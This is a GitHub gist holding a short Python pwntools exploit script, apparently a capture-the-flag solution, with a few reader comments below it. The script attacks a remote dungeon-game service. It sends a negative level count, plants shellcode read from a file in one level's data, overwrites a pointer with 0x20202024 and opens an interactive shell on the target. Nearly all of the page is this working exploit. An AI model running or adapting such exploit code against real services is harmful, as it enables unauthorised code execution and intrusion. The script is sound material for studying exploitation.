Skip to content

Instantly share code, notes, and snippets.

@m--- m---/wby.py Secret
Created Mar 17, 2015

Embed
What would you like to do?
# coding: utf-8
import os
import sys
import time
import re
import struct
import pwn
host = 'wildblue.termsec.net'
port = 2323
p = lambda x: struct.pack('<I', x)
s = pwn.remote(host, port)
payload = ('C' * 0x20) + p(0x20202024) + open('x86-linux-sh', 'rb').read()
print s.recvuntil('By what name shall we know thee? \n')
s.send('AAAA\n')
print s.recvuntil('What is your choice?\n')
s.send('1\n')
print s.recvuntil('How many levels should your dungeon have [1-3]:\n')
s.send('-1\n')
for i in range(0x0, 0xb2):
print s.recvuntil('Enter your data for level %d:\n' % i)
s.send('a' + '\n')
print s.recvuntil('Enter your data for level %d:\n' % 0xb2)
s.send(payload + '\n')
for i in range(0xb3, 0xff):
print s.recvuntil('Enter your data for level %d:\n' % i)
s.send('c' + '\n')
time.sleep(1)
print s.recvuntil('What is your choice?\n')
s.send('3\n')
print s.recvuntil('By what name shall we know thee? \n')
s.send(('D' * 48) + p(0x20202024) + '\n')
print s.recvuntil('What is your choice?\n')
s.send('4\n')
s.interactive()
@Grazfather

This comment has been minimized.

Copy link

commented Mar 18, 2015

What is the pwn lib?

@m---

This comment has been minimized.

Copy link
Owner Author

commented Mar 18, 2015

@Grazfather

This comment has been minimized.

Copy link

commented Mar 18, 2015

Thanks!

@letitbezh

This comment has been minimized.

Copy link

commented Apr 20, 2017

excuse me ! why we should locate in 0x20202020? I don‘t konw why 0x20202020 is executable? thank you for your writeup。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.